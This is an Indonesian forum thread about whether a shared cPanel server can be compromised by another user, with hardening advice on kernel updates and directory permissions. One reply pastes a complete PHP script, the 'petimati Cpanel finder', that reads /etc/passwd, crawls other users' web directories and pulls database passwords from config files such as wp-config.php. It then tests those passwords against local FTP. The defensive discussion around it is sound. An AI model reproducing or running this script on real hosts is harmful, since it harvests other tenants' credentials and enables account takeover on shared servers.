Satu Server bisa dihack kalau ada akses dari cpanel?


Status
Not open for further replies.
nte coba update kernel ke 2010 soalnya sekarng banyak exploit2 root terutama kalau kernel kita dibawah 2010 kebwah sudah di pastikan bisa kena exploit root, yang sering dipake para hacker, terus etc/passwd setiap user di tutup jadi pas di scan pake scrift php seperti dibawah ini tidak akan kebaca user2 cpanel yang ada di server kita
<?php
/*
petimati
*/
echo '<html><head><title>petimati Cpanel finder</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] ".print_r($users)." Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
read_dir($path,$user);
}
echo "\n[+] Finished\n";
function read_dir($path,$username)
{
if ($handle = opendir($path))
{
while (false !== ($file = readdir($handle)))
{
$fpath = "$path$file";
if (($file != '.') and ($file != '..'))
{
if (is_readable($fpath))
{
$dr = $fpath."/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
if (
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='config.backup.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='configuration.php')
or ($file=='wp_config.php')
or ($file=='wp-config.php')
or ($file=='inc.php')
or ($file=='setup.php')
or ($file=='dbconf.php')
or ($file=='dbconfig.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='connect.php')
or ($file=='index.php')
or ($file=='common.php')
or ($file=='configure.php')
or ($file=='config_global.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
or ($file=='dbconnect.inc.php'))
{
$pass = get_pass($fpath);
if ($pass != '')
{
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link)
{
@$config = fopen($link,'r');
while(!feof($config))
{
$line = fgets($config);
if (strstr($line,'pass')
or strstr($line,'pwd')
or strstr($line,'db_pass')
or strstr($line,'password')
or strstr($line,'DB_PASSWORD')
or strstr($line,'dbpass')
or strstr($line,'passwd'))
{
if (strrpos($line,'"'))
{
preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
$pass = str_replace("]=\"","",$pass);
}

else
preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
$pass = str_replace("]='","",$pass);
return $pass[2];
}
}
}
function ftp_check($login,$pass)
{
@$ftp = ftp_connect('127.0.0.1');
if ($ftp)
{
@$res = ftp_login($ftp,$login,$pass);
if ($res)
{
echo '[FTP] '.$login.':'.$pass." Success !\n";
}
else ftp_quit($ftp);
}
}
echo '</textarea><br><br>Coded by <b>devilzc0de</b> & <b>petimati</b> <a href=http://devilzc0de.org>Homepage</a></body></html>';
?>
Click to expand...

semoga membantu
ini ada artikel buatan saya pas waktu mengisi seminar di universitas muhamadiah jakarta tentang cara ngeroot dari server ke server, siapa tau aja jadi bisa membantu untuk meningkatakan securty server.
link download http://upload.ugm.ac.id/63500076.ppt
 
Pastikan permission /home 711, sehingga user lain tdk bisa melihat folder di bawah /home.
 
bisa saja asalkan tersangkan punya akses ke ssh console (meski hanya sbg user biasa) klo gak punya biasanya pake script shell injection (dgn memanfaatkan bug pd cms/script/code web target) :-s
standar dasar sieh: minimal permision folder diset 755, permision file diset 644, folder/file kan jg dikasih owner & group masing2, jgn sekali2 bikin permision folder/file 777. <= saya rasa ini sdh ckp utk menghindari akses dr user satu ke folder/file user lainnya :D
cmiiw
 
Status
Not open for further replies.
Back
Top